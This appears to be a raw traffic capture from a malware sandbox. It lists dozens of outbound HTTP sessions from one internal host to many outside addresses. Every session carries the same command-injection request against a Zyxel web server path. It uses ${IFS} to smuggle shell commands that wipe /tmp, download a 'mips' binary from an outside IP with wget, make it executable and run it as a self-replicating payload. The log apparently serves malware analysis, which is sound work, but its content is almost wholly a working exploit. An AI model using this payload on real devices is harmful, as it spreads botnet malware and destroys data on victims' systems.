                              Mar 31, 2024 08:41:35.963655949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5619192.168.2.1358976116.221.155.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963709116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5620192.168.2.135117039.252.200.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963711023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5621192.168.2.1347166167.97.71.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963793993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5622192.168.2.1350214122.155.44.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963855028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5623192.168.2.1359886163.52.6.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963886976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5624192.168.2.1340416170.197.153.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963929892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5625192.168.2.1352210183.69.111.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.963982105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5626192.168.2.135406490.102.19.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964005947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5627192.168.2.1351740117.48.188.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964039087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5628192.168.2.1349048130.196.11.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964093924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5629192.168.2.1352188120.95.68.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964154959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5630192.168.2.134955291.195.192.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964214087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5631192.168.2.1350130119.45.131.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964263916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5632192.168.2.135605269.57.135.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964309931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5633192.168.2.1351438185.38.225.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964343071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5634192.168.2.1334172108.245.98.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964400053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5635192.168.2.13452689.237.231.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964451075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5636192.168.2.133807497.251.62.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964485884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5637192.168.2.1359892142.58.8.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964544058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5638192.168.2.1339152209.73.159.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964580059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5639192.168.2.1349086132.175.75.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964613914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5640192.168.2.1357186114.240.42.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964668036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5641192.168.2.135189614.116.8.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964704037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5642192.168.2.1351334180.171.74.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964735985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5643192.168.2.1339150129.16.58.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964787006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5644192.168.2.134153068.75.241.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964843988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5645192.168.2.1347688114.250.130.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964878082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5646192.168.2.1351012142.212.147.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964924097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5647192.168.2.1339932105.93.32.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.964977026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5648192.168.2.1345342103.107.19.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965019941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5649192.168.2.1344900120.41.68.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965080023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5650192.168.2.1332900120.7.10.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965121984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5651192.168.2.13359969.79.50.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965154886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5652192.168.2.1357118193.149.167.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965205908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5653192.168.2.1343286157.136.246.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965266943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5654192.168.2.1341194148.24.81.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965310097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5655192.168.2.1354492161.234.200.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965343952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5656192.168.2.133665672.92.119.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965416908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5657192.168.2.1346608190.253.149.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965456963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5658192.168.2.13538561.88.41.36443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965492010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5659192.168.2.135455812.105.113.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965557098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5660192.168.2.1345086195.211.12.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965620041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5661192.168.2.133523436.61.123.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965679884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5662192.168.2.1358222161.165.2.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965708971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5663192.168.2.1338704124.47.249.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965744972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5664192.168.2.1342440135.199.11.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.965802908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5665192.168.2.1347408142.47.19.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.969264030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5666192.168.2.1342922134.135.36.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.969887018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5667192.168.2.133400058.35.202.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.969930887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5668192.168.2.1349178189.127.118.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.969969988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5669192.168.2.1350928208.33.105.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.969991922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5670192.168.2.1352650191.190.179.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970045090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5671192.168.2.1348560185.165.228.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970092058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5672192.168.2.1339006188.79.137.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970155954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5673192.168.2.1356504195.243.128.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970217943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5674192.168.2.1351652217.81.81.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970257044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5675192.168.2.134118849.23.236.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970320940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5676192.168.2.1336360167.4.106.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970345020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5677192.168.2.135741894.131.246.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970380068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5678192.168.2.133866865.145.175.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:35.970402956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5679192.168.2.133745276.10.207.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.974854946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5680192.168.2.1343608110.39.26.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.974891901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5681192.168.2.1350758170.112.185.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.974953890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5682192.168.2.135896425.6.140.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.974962950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5683192.168.2.135560863.23.89.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975024939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5684192.168.2.1355144101.175.142.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975073099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5685192.168.2.1342934172.137.44.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975091934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5686192.168.2.133696489.46.236.61443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:36.975178003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5687192.168.2.1356144145.176.215.178443
                              TimestampBytes transferredDirectionData
